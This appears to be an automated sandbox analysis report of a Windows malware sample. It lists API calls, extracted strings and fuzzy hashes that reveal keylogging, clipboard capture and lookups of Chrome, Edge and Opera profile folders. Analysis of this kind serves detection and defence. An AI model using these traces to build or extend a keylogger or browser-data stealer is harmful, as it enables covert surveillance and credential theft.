                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                          • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                                                                          • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                          • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                                          Strings
                                                                                          • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                          • String ID: /sort "Visit Time" /stext "
                                                                                          • API String ID: 368326130-1573945896
                                                                                          • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                                                                          • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                                                                          • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                                                                          • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                                                                          APIs
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                          • API String ID: 1881088180-3686566968
                                                                                          • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                                                                          • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                                                                          • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                                                                          • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                                                                          APIs
                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 0-711371036
                                                                                          • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                          • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                                                                          • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                          • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                                                                          APIs
                                                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                                          • IsWindowVisible.USER32(?), ref: 00415B37
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$TextVisible
                                                                                          • String ID: (%G
                                                                                          • API String ID: 1670992164-3377777310
                                                                                          • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                                                                          • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                                                                          • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                                                                          • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                                          Strings
                                                                                          • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 481472006-507513762
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                                          • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                          • String ID: (F
                                                                                          • API String ID: 3761405300-3109638091
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                          • API String ID: 481472006-2430845779
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: alarm.wav$x(G
                                                                                          • API String ID: 1174141254-2413638199
                                                                                          APIs
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                                          Similarity
                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                          • String ID: Online Keylogger Stopped
                                                                                          • API String ID: 1623830855-1496645233
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                          • API String ID: 1174141254-2800177040
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                          • API String ID: 1174141254-4188645398
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                          • API String ID: 1174141254-1629609700
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 0040A597
                                                                                            • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                                                                            • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                            • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                            • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                                            • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                                            • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Similarity
                                                                                          • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                          • String ID: [AltL]$[AltR]
                                                                                          • API String ID: 3195419117-2658077756
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                                          Similarity
                                                                                          • API ID: State
                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                          • API String ID: 1649606143-2446555240
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                                                                          Similarity
                                                                                          • API ID: DeleteOpenValue
                                                                                          • String ID: 6h@
                                                                                          • API String ID: 2654517830-73392143
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                                          • GetLastError.KERNEL32 ref: 0043B4E9
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1717984340-0
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                                          • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                                                                          • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                                          Similarity
                                                                                          • API ID: ErrorLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 4100373531-0